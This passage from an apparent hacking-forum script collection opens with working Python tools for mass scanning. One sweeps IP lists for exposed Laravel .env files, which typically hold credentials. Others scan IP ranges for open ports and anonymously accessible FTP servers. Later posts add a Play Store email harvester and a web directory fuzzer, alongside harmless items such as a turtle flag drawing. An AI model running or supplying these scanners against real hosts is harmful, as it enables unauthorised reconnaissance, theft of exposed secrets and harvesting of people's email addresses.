"/whturk/.env", "/windows/tests/9.2.x/.env", "/windows/tests/9.3.x/.env", "/wp-content/.env", "/www-data/.env", "/www/.env", "/xx-final/vue-heroes/.env", "/zmusic-frontend/.env"], "marks" : ["Laravel", "laravel", "https://laravel.com/", "https://laracon.eu/online/"],} main_url = tools().create_http_url(ip, port, file = "", prot = "http") main_server_info = tools().get_http_headers(main_url) #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) #print target_return[3] if target_return[0] == False: print "Host down" break if target_return[1] == 200: result_line = "%s Server: %s" %(main_url+path, main_server_info['Server']) if any(k in target_return[3] for k in __info__['marks']): print "[*] laravel:", target_url tools().logging(__info__['log_result_file'], target_url) else: tools().logging(__info__['log_unknwn_result_file'], target_url) class main(): """ Main part which controls the complete program """ def __init__(self, file, timeout = 10): self.file = read_file_ip(file) global scan scan = scan(timeout) def run(self, threads): threads = int(threads) print "\n" print "[INFO] Scanning with %s Thread(s)\n" %threads while True: line = self.file.next_line() if line == False: break while True: if threading.active_count() <= threads: ip_port = line.split(":") if(re.match("((25[0-5]|2[0-4]\d|1\d\d|[1-9]\d|\d)\.){3}(25[0-5]|2[0-4]\d|1\d\d|[1-9]\d|\d)",ip_port[0]) != None): ip = ip_port[0] port = ip_port[1].split(" ")[0] t = threading.Thread(target=scan.check, args=(ip, port)) t.deamon = False t.start() break else: break return True if __name__ == "__main__": __version__ = "by FXP-T Team - www.fxp-terminal.info" def help(): print "--------------------------------------------------------------------" print " Schm3ckm0-Ch3ck3R v0.5 " print "- .py <file> results.txt <threads> [timeout] " print "-- *** " print "- Respect to: " print " " print "- ddr, b2r, bwc, il, maro, burnz, chucky, " print "- gil, bebop, Gnu, airy, fake, " print "- dodo, mani, Buster and all i foget :D " print "-- *** " print "- " print "- Respect to: " print "- FXP-T Team, [email protected]@R-LightS and Friends, moep, izibitzi, Stylez " print " " print " < Changelog > " print " " print " " print " " print " " print " 28.01.2021 - SSLError Fix , True, False and None , durch getestet " print "-18.01.2021 - diverse path erweiterungen------------------------- " print "-18.01.2021 - module_scan_laravel_and_phpunit hinzugefügt-------- " print "-01.10.2020 - Adminer modul hinzugefügt-------------------------- " print " 03.10.2020 - Scan module erweitert------------------------------ " print " 28.02.2020 - Bug Fixes, Brute Module eing...-------------------- " print " 01.10.2020 - Bug Fixes und kleib tests durchgefürt " print "--------------------------------------------------------------------" if len(sys.argv) == 3: main = main(sys.argv[1]) main.run(sys.argv[2]) elif len(sys.argv) == 4: main = main(sys.argv[1], timeout = sys.argv[3]) main.run(sys.argv[2]) else: help()
  4. """ Port-/FTP-Scanner """ import socket import threading import sys import time import argparse def CheckIfOpen(ip,port): target = (ip,int(port)) try: socket.create_connection(target,1.5) open('open','a').write(ip+":"+str(port)+"\n") print("Port: "+str(port)+" open on IP: "+ip+"!\n") except: print("Port: "+str(port)+" closed on IP: "+ip+"!\n") def CheckIfPub(target): try: server = (target,21) user = "USER anonymous\r\n" pwd = "PASS anonymous\r\n" sock = socket.socket() sock.connect(server) sock.recv(4096) sock.sendall(user.encode()) if "331" in sock.recv(4096).decode('utf-8'): sock.sendall(pwd.encode()) answer = sock.recv(4096).decode('utf-8') if "230" in answer: open('found_ftp','a').write(target+":21 anonymous:anonymous\n") sock.recv(4096) sock.close() elif "530" in answer: sock.close() else: sock.close() except: print("Login failed!\n") pass parser = argparse.ArgumentParser() parser.add_argument("scan", type=str,choices=["ftp","port"],help="decide whether to scan for pubs or ports.") parser.add_argument("ranges",type=str,help="specify the file containing the ranges to scan, format: 123.123.123.123 123.123.123.123") parser.add_argument("-t","--threads",type=int,help="specify amount of threads, else the default will be 100.") parser.add_argument("-p","--ports",type=str,help="specify the port or ports to scan if you decided to scan for open ports. format: port1,port2,port3,...") args = parser.parse_args() if args.threads: threads = args.threads else: threads = 100 ranges = open(args.ranges).read().splitlines() for ipranges in ranges: chain = ipranges.split(" ") start = chain[0].split(".") end = chain[1].split(".") if int(end[3]) != 255: end[3] = int(end[3])+1 else: if int(end[2]) != 255: end[2] = int(end[2])+1 end[3] = 0 else: if int(end[1]) != 255: end[1] = int(end[1])+1 end[2] = 0 end[3] = 0 else: if int(end[0]) != 255: end[0] = int(end[0])+1 end[1] = 0 end[2] = 0 end[3] = 0 end = str(end[0])+"."+str(end[1])+"."+str(end[2])+"."+str(end[3]) current = str(start[0])+"."+str(start[1])+"."+str(start[2])+"."+str(start[3]) if args.scan == "port": try: ports = args.ports.split(",") except: ports = args.ports elif args.scan == "pub": ports = 21 while(current != end): for port in ports: if threading.active_count() <= threads: if args.scan == "port": T = threading.Thread(target=CheckIfOpen,args=(current,int(port),)) elif args.scan == "ftp": T = threading.Thread(target=CheckIfPub,args=(current,)) T.start() else: time.sleep(0.2) if args.scan == "port": T = threading.Thread(target=CheckIfOpen,args=(current,int(port),)) elif args.scan == "ftp": T = threading.Thread(target=CheckIfPub,args=(current,)) T.start() progress = current.split(".") if int(progress[3]) != 255: progress[3] = int(progress[3])+1 else: if int(progress[2]) != 255: progress[2] = int(progress[2])+1 progress[3] = 0 else: if int(end[1]) != 255: progress[1] = int(progress[1])+1 progress[2] = 0 progress[3] = 0 else: if int(progress[0]) != 255: progress[0] = int(progress[0])+1 progress[1] = 0 progress[2] = 0 progress[3] = 0 current = str(progress[0])+"."+str(progress[1])+"."+str(progress[2])+"."+str(progress[3]) open('current_ip','w').write(current) T.join() print("Scan finished!\n") exit()
  5. #!/usr/bin/python import time, socket, struct, threading, sys class file(): def __init__(self, file): self.file = open(file, "r") def next_line(self): try: next_line = self.file.next().rstrip() except StopIteration: next_line = False self.act_line = next_line return self.act_line def actual_line(self): return self.act_line class class_tools(): def __init__(self): pass def init_iprange(self, start, end): """ Init iprange, must be called before iprange_nextip! """ self.var_iprange_start = start self.var_iprange_end = end self.var_iprange_now = None def iprange_nextip(self): """ Calc next ip for range defined wiht init_iprange. If Range is finished it returns False. """ if self.var_iprange_now == None: self.var_iprange_now = self.var_iprange_start elif self.var_iprange_now != self.var_iprange_end: self.var_iprange_now = self.ip2nextip(self.var_iprange_now) else: return False return self.var_iprange_now def ip2nextip(self, ip): """ Calc next the next ip """ long_ip = self.ip2long(ip) long_ip += 1 next_ip = self.long2ip(long_ip) return next_ip def ip2long(self, ip): """ Convert ip to a long """ packed = socket.inet_aton(ip) return struct.unpack("!L", packed)[0] def long2ip(self, n): """ Convert a long to ip """ unpacked = struct.pack('!L', n) return socket.inet_ntoa(unpacked) def ipportopen(self, host, port, timeout = 10): """ Check if a port is open and return true or false """ s = socket.socket() s.settimeout(timeout) try: s.connect((host, port)) except socket.error as e: e = str(e) return [False, e] return [True] def logging(self, file, value): """ Append value to file """ log_file = open(file, "a") log_file.write(value+"\r\n") log_file.close() def range_line_struct(self, line): """ structure/parse a range line """ tmp_line = line.split(" ") # To do: # - add regex to match if valid ip if len(tmp_line) != 2: return False else: return [tmp_line[0], tmp_line[1]] def createDaemon(): try: # Fork a child process so the parent can exit. This returns control to # the command-line or shell. It also guarantees that the child will not # be a process group leader, since the child receives a new process ID # and inherits the parent's process group ID. This step is required # to insure that the next call to os.setsid is successful. pid = os.fork() except OSError as e: raise Exception("%s [%d]" % (e.strerror, e.errno)) if (pid == 0): # The first child. # To become the session leader of this new session and the process group # leader of the new process group, we call os.setsid(). The process is # also guaranteed not to have a controlling terminal. os.setsid() # Is ignoring SIGHUP necessary? # # It's often suggested that the SIGHUP signal should be ignored before # the second fork to avoid premature termination of the process. The # reason is that when the first child terminates, all processes, e.g. # the second child, in the orphaned group will be sent a SIGHUP. # # "However, as part of the session management system, there are exactly # two cases where SIGHUP is sent on the death of a process: # # 1) When the process that dies is the session leader of a session that # is attached to a terminal device, SIGHUP is sent to all processes # in the foreground process group of that terminal device. # 2) When the death of a process causes a process group to become # orphaned, and one or more processes in the orphaned group are # stopped, then SIGHUP and SIGCONT are sent to all members of the # orphaned group." [2] # # The first case can be ignored since the child is guaranteed not to have # a controlling terminal. The second case isn't so easy to dismiss. # The process group is orphaned when the first child terminates and # POSIX.1 requires that every STOPPED process in an orphaned process # group be sent a SIGHUP signal followed by a SIGCONT signal. Since the # second child is not STOPPED though, we can safely forego ignoring the # SIGHUP signal. In any case, there are no ill-effects if it is ignored. # # import signal # Set handlers for asynchronous events. # signal.signal(signal.SIGHUP, signal.SIG_IGN) try: # Fork a second child and exit immediately to prevent zombies. This # causes the second child process to be orphaned, making the init # process responsible for its cleanup. And, since the first child is # a session leader without a controlling terminal, it's possible for # it to acquire one by opening a terminal in the future (System V- # based systems). This second fork guarantees that the child is no # longer a session leader, preventing the daemon from ever acquiring # a controlling terminal. pid = os.fork() # Fork a second child. except OSError as e: raise Exception("%s [%d]" % (e.strerror, e.errno)) if (pid == 0): # The second child. # Since the current working directory may be a mounted filesystem, we # avoid the issue of not being able to unmount the filesystem at # shutdown time by changing it to the root directory. # os.chdir(WORKDIR) EDIT by Whyned: Not important for me ;) # We probably don't want the file mode creation mask inherited from # the parent, so we give the child complete control over permissions. #os.umask(UMASK) EDIT by Whyned: Not important for me ;) pass else: # exit() or _exit()? See below. os._exit(0) # Exit parent (the first child) of the second child. else: # exit() or _exit()? # _exit is like exit(), but it doesn't call any functions registered # with atexit (and on_exit) or any registered signal handlers. It also # closes any open file descriptors. Using exit() may cause all stdio # streams to be flushed twice and any temporary files may be unexpectedly # removed. It's therefore recommended that child branches of a fork() # and the parent branch(es) of a daemon use _exit(). os._exit(0) # Exit parent of the first child. def func_help(): print((""" :: pyRangeScanner v%s :: With this Tool you can scan a range for (multiple) open port(s) It can handle a single range or a file with multiple ranges and it supports threads. :: HELP :: .py -r range_start range_end ports threads [timeout] .py -rf range_file ports threads [timeout] ports = 80 or for multiple ports 80,8080,81... Default Timeout = %s :: EXAMPLE :: .py -r 127.0.0.0 127.0.1.0 80,8080,22 20 10 .py -rf xyz.txt 80,8080,22 20 10 :: EXAMPLE RANGE FILE :: 127.0.0.0 127.0.1.0 125.1.1.0 125.2.0.0 ... :: GREETS :: Greets fly out to: Team DDR, Team WTC, BWC, Inferno-Load, B2R, Datenreiter, Burnz, Gil, LeChuck, Bebop, Fr0sty, Gnu, Airy, FaKe, Generation, Shizuko, leety and all i forget! """ %(__info__['version'], __info__['def_timeout']))) def func_portcheck(ip, port, timeout): """ Handle return from tools.ipportopen and log to file """ log_result = "result.txt" log_failure = "log.txt" tmp_ip = tools.ipportopen(ip, port, timeout) sys.stdout.write("[*] Checking: %s %s\n" %(ip, port)) if tmp_ip[0] != False: sys.stdout.write("[+] %s Port %s Open!\n" %(ip, port)) tools.logging(log_result, "%s:%s" %(ip, port)) elif tmp_ip[0] == False: sys.stdout.write("[-] %s Port %s %s\n" %(ip,port, tmp_ip[1])) tools.logging(log_failure, "%s:%s %s" %(ip, port, tmp_ip[1])) def func_portcheckv1(ip, port, timeout): """ Handle return from tools.ipportopen and log to file port must be array! """ log_result = "result.txt" log_failure = "log.txt" timeout = int(timeout) for tmp_port in port: tmp_port = int(tmp_port) tmp_ip = tools.ipportopen(ip, tmp_port, timeout) sys.stdout.write("[*] Checking: %s %s\n" %(ip, tmp_port)) if tmp_ip[0] != False: sys.stdout.write("[+] %s Port %s Open!\n" %(ip, tmp_port)) tools.logging(log_result, "%s:%s" %(ip, tmp_port)) elif tmp_ip[0] == False: sys.stdout.write("[-] %s Port %s %s\n" %(ip, tmp_port, tmp_ip[1])) tools.logging(log_failure, "%s:%s %s" %(ip, tmp_port, tmp_ip[1])) if tmp_ip[0] == False and tmp_ip[1] == "timed out" or tmp_ip[0] == False and tmp_ip[1] == "[Errno 101] Network is unreachable": # Delete this if you want to check all ports sys.stdout.write("[-] Skipping other Ports from %s" %(ip)) break def main1(range_start, range_end, port, timeout): """ Check a Range for open port (single threaded) """ tools.init_iprange(range_start, range_end) while True: next_ip = tools.iprange_nextip() if next_ip != False: print(next_ip) print((tools.ipportopen(next_ip, port, timeout = timeout))) else: break def main2(range_start, range_end, port, timeout, threads): """ Check a Range for open port (multi threaded) """ tools.init_iprange(range_start, range_end) while True: if threading.active_count() < threads: next_ip = tools.iprange_nextip() if next_ip != False: thread = threading.Thread(target=func_portcheck, args=(next_ip, port, timeout,)) thread.start() else: break while threading.active_count() != 1: #Wait until all threads are finished. time.sleep(0.1) def main2v1(range_start, range_end, port, timeout, threads): """ Check a Range for open port(s) (multi threaded) port argument must be array! """ threads = int(threads) tools.init_iprange(range_start, range_end) while True: if threading.active_count() <= threads: print((threading.active_count(), threads)) next_ip = tools.iprange_nextip() if next_ip != False: thread = threading.Thread(target=func_portcheckv1, args=(next_ip, port, timeout,)) thread.start() else: break while threading.active_count() > 2: #Wait until all threads are finished. time.sleep(0.1) def main3(range_file, port, timeout, threads): """ Check Ranges from Range file for open port """ range_file = file(range_file) while True: #Read range_file line per line line = range_file.next_line() if line == False: break line_split = tools.range_line_struct(line) main2(line_split[0], line_split[1], port, timeout, threads) def main3v1(range_file, port, timeout, threads): """ Check Ranges from Range file for multiple open ports port must be array! """ range_file = file(range_file) while True: #Read range_file line per line line = range_file.next_line() if line == False: break line_split = tools.range_line_struct(line) main2v1(line_split[0], line_split[1], port, timeout, threads) if __name__ == "__main__": global tools, __info__ __info__ = {} __info__['version'] = "0.1" __info__['def_timeout'] = 10 tools = class_tools() #main1("173.194.35.151", "173.194.35.160", 80, 2) #main2("173.194.35.151", "173.194.35.160", 81, 2, 10) #main3("/tmp/test.txt", 80, 2, 10) #main2v1("192.168.178.0", "192.168.179.0", [81, 80], 2, 10) #main3v1("/tmp/test.txt", [80, 8080, 21], 2, 20) print((len(sys.argv),sys.argv)) if len(sys.argv) >= 5: if sys.argv[1] == "-rf": if len(sys.argv) == 6: # Use range_file and timeout # .py -rf rangefile port,port,port threads timeout range_file = sys.argv[2] port = sys.argv[3].split(",") threads = int(sys.argv[4])+1 timeout = sys.argv[5] main3v1(range_file, port, timeout, threads) elif len(sys.argv) == 5: # Use range_file and no timeout # .py -rf rangefile port,port,port threads (timeout = default = 10) range_file = sys.argv[2] port = sys.argv[3].split(",") threads = int(sys.argv[4])+1 timeout = __info__['def_timeout'] main3v1(range_file, port, timeout, threads) else: func_help() elif sys.argv[1] == "-r": if len(sys.argv) == 7: # Use a single range and timeout # .py -r range_start range_end port,port,port threads timeout range_start = sys.argv[2] range_end = sys.argv[3] port = sys.argv[4].split(",") threads = int(sys.argv[5])+1 timeout = sys.argv[6] main2v1(range_start, range_end, port, timeout, threads) elif len(sys.argv) == 6: # Use a single range and no timeout # .py -r range_start range_end port,port,port threads range_start = sys.argv[2] range_end = sys.argv[3] port = sys.argv[4].split(",") threads = int(sys.argv[5])+1 timeout = __info__['def_timeout'] main2v1(range_start, range_end, port, timeout, threads) else: func_help() else: func_help() else: func_help()
  6. Hey Guys! I am Venom! I hope you all are fine! Today I am sharing the web crawler script written in python ! So let's begin! import requests # using requests library for getting the source code from site. import re # using re module for getting a tags from urllib.parse import urljoin # urlparse to parse the url from bs4 import BeautifulSoup # using bs4 to parse code using html parser urls = [] # to store the urls used target_links = [] url = [] target = input("[+] Enter the url: ") # taking target url as user input def extract(tar): # making a function extract with a value tar try: # try and except loop in case we got some status or http error response = requests.get(target) # getting the url content using get requests soup = BeautifulSoup(response.content, 'html.parser') # parsing the content return re.findall('(?:href=")(.*?)"', str(soup)) # find urls using the regex pattern except: pass # if any error occurs then just pass the data! def crawl(path): # making another function crawl which takes an argument links = extract(path) # now the function extract with get all the links from the argument given which is target in our case for link in links: # using for loop to format the urls and crawl them again one by one url = urljoin(path, link) # if url is not complete then joining the url with target if "#" in url: # if else loop url = url.split("#")[0] # if there is a # in url then just split the url and print the first path if link in url and url not in target_links: # if the link is in url list and url is not in the target list then target_links.append(url) # append the url to target link urls.append(target_links) print("[+] " + url) # printing the url which we have found! crawl(url) # now again running the crawl loop on the url! crawl(target) # running the crawl function with target url as argument!
  7. The Project Credit goes to @AS Hacker Am Posting from his behalf. So in this python code with the help of turtle graphics we would gonna print the National Flag Of INDIA. 🙏 It's a short crisp project. Hope you learn something new out of it. So, let's roll. So, here's the source code with explanation to it. So enjoy reading. import turtle from turtle import* #screen for output screen = turtle.Screen() # Defining a turtle Instance t = turtle.Turtle() t.speed(10) # initially penup() t.penup() t.goto(-400, 250) t.pendown() # Orange Rectangle #white rectangle t.color("orange") t.begin_fill() t.forward(800) t.right(90) t.forward(167) t.right(90) t.forward(800) t.end_fill() t.left(90) t.forward(167) # Green Rectangle t.color("green") t.begin_fill() t.forward(167) t.left(90) t.forward(800) t.left(90) t.forward(167) t.end_fill() # Big Blue Circle t.penup() t.goto(70, 0) t.pendown() t.color("navy") t.begin_fill() t.circle(70) t.end_fill() # Big White Circle t.penup() t.goto(60, 0) t.pendown() t.color("white") t.begin_fill() t.circle(60) t.end_fill() # Mini Blue Circles t.penup() t.goto(-57, -8) t.pendown() t.color("navy") for i in range(24): t.begin_fill() t.circle(3) t.end_fill() t.penup() t.forward(15) t.right(15) t.pendown() # Small Blue Circle t.penup() t.goto(20, 0) t.pendown() t.begin_fill() t.circle(20) t.end_fill() # Spokes t.penup() t.goto(0, 0) t.pendown() t.pensize(2) for i in range(24): t.forward(60) t.backward(60) t.left(15) #to hold the #output window turtle.done() output-flag_FHroUYa7.mp4
  8. Hey Guys! I am Venom! Today I am going to share some basic methods and functions of requests library ! If you want to know more about the same please do comment and lemme know! 🙂 import requests # for importing the library url = "https://forum.shellcrew.org" headers = {"host": "forum.shellcrew.org", "origin": "shellcrew.org", "referer": "venomgrills.com", "Cookies": "somerandomcookies", "Accept": "application/json", "Content-Type": "application/json"} data = {"username": "admin", "password": "admin"} auth = {"user": "venom", "password": "fuck0ff"} response = requests.get(url) # making a get requests url (You can use any url like https://venomgrills.com) response = requests.get(url, auth=auth) response = requests.get(url, headers=headers) # make a get requests with headers response = requests.get(url, headers=headers, allow_redirects=True) # make a get requests with redirections response = requests.post(url, headers=headers, data=data) # Making a post based requests with data and headers response = requests.put(url, headers=headers, data=data) # Making a put requests with data and headers response = requests.get(url, timeout=0.5) # Making a get requests with timeout (time is in seconds) statusCode = response.status_code # for getting status code of any requests header = response.headers # for getting headers of any response cookies = response.cookies # for getting cookies of any response history = response.history # for getting history of any response encoding = response.encoding # for getting encoding of any response content = response.content # for getting content of any response this includes html tags, tabs etc. # Errors and exceptions in requests library try: response = requests.get(url) except requests.exceptions.ConnectionError as e: print("Connection error") # if website is down or unavilable then there is a connection error try: response = requests.get(url) except requests.exceptions.SSLError as e: print("The website has an invalid or expired ssl certificate!") try: response = requests.get(url) except requests.exceptions.InvalidHeader as e: print("Invalid header given (*_*)") # If you want more detailed info about requests library please do comment down for the second part!! :)
  9. ABOUT THE SERIES This is the first video and series by Pentest With Rohit in Bug Bounty.This series demonstrates the hands-on automation using python for each topic mentioned in the video. This series gives you a basic idea of how to automate something to reduce the repetitive tasks and perform automated ways of OSINT and Reconnaissance.This series also gives you the overview of the python programming in the python crash course section.Because we will need python programming basic knowledge.. WHY DO WE NEED AUTOMATION? Repetitive manual work wastes our time and energy. It may exhaust you from what you are doing.So we need to automate these repetitive tasks to save our time and energy to focus on other areas WHY PYTHON? Python is very easy to learn for newcomers and beginners. It has simplified syntax so anybody can easily read and understand the code. There are lots of tools and modules available for python to do our tasks by writing a few lines of code that is why i have choosen python for this series. Watch To Know More About This Series Then Just Click Here
  10. Hello Freinds I m Venom (Gaurav) founder of Venomgrills and a Mod at Shell_Crew. So Let's look at a cool python script developed by me hope you guys enjoy and will learn from it so let's go. # Importing libraries import requests # requests library to making a get request for the webpage from bs4 import BeautifulSoup # to parse the html and read the content from html attributes and tags import re # regex to check email if any in the parsed data emailList = [] # making a list to add emails which we get from site x = 0 # an integer variable x with value 0.This will help us to index the content of the emailist emailRegex = r"""(?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\.){3}(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9])|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\])""" # this is the regular expression for email format query = input("Enter your query: ") # taking any word as input like food apps or gaming apps url = "https://play.google.com/store/search?q=" + query +"&c=apps" # url for searching the apps as per are query # this us the scrap part where we will scrape the apps link for above url response = requests.get(url).content # making a get request to get the source code of website soup = BeautifulSoup(response, 'html.parser') # using beautiful soup with html parser to parse the content of the response variable for links in soup.findAll("a", class_="JC71ub"😞 # making a for loop which will grab the content from a tag with class "JC71UB" attribute (This is the tag where all the app links are given) link = links.get("href") # grabbing the link from href attribute finalLink = "https://play.google.com" + link # final link = initial playstore link + app link from above href attribute response = requests.get(finalLink).content # making a get request to fetch the content inside the webpage soup = BeautifulSoup(response, 'html.parser') # again parsing the html content using html parser for emails in re.finditer(emailRegex, str(soup)): # using re library to find the email pattern from the source of web page email = emails.group() # converting the emails output in a string emailList.append(email) # if email exists then adding it to the emailist given in the line 6 print(emailList[x]) # now printing the value of emails from the emaillist with x as indexing output = open("emails.txt", 'a') # opening a text file with name emails.txt in append mode to add the code output.write(emailList[x]) # write emails to the text file output.close() # closing the output file to save the output x += 3 # here we are adding three as we are indexing the list we are getting an email 3 times in webpage in order to avoid multiple prints we are skipping three emails everytime to avoid duplicates playstore_python.mp4
  11. Hii guys I m Venom!. So today we will see a short python3 script for a web-fuzzer. I hope u will learn something new out of it. So let's roll. # importing libraries import requests # for making request to website import os # for checking wordlist path url = input('Enter the url: ') # taking url as user input wordlist = input('Enter the wordlist path: ') # taking wordlist as user input # checking if wordlist exists or not if os.path.exists(wordlist) is False: # if wordlist does not exists then print that wordlist not found print("Wordlist not found! Please try again!") else: # if wordlist do exists then run this thing print("Wordlist Found: True!") op = open(wordlist, 'r') # opening the wordlist file read = op.readlines() # reading the content inside the file for path in read: # we are using a for loop to grab each and everyline finalurl = url + "/" + path # apending the which is targeturl + path response = requests.get(finalurl) # making a get request to get the status code of the website if response.status_code == 200 or response.status_code == 403: # checking if status is 200 or 403 print(finalurl + " [" + str(response.status_code) + "]") # if status code is 200 or 403 print the finalurl else: # else pass the response pass fuzzer_2-Veed.mp4
  12. Machine learning Bootcamp for Beginners 2021: Introduction 🧩 Apply coupon "2021HOTSKILLS" on checkout to get this course for FREE Get it Here: https://www.learnmall.in/course/introduction-to-machine-learning-algorithms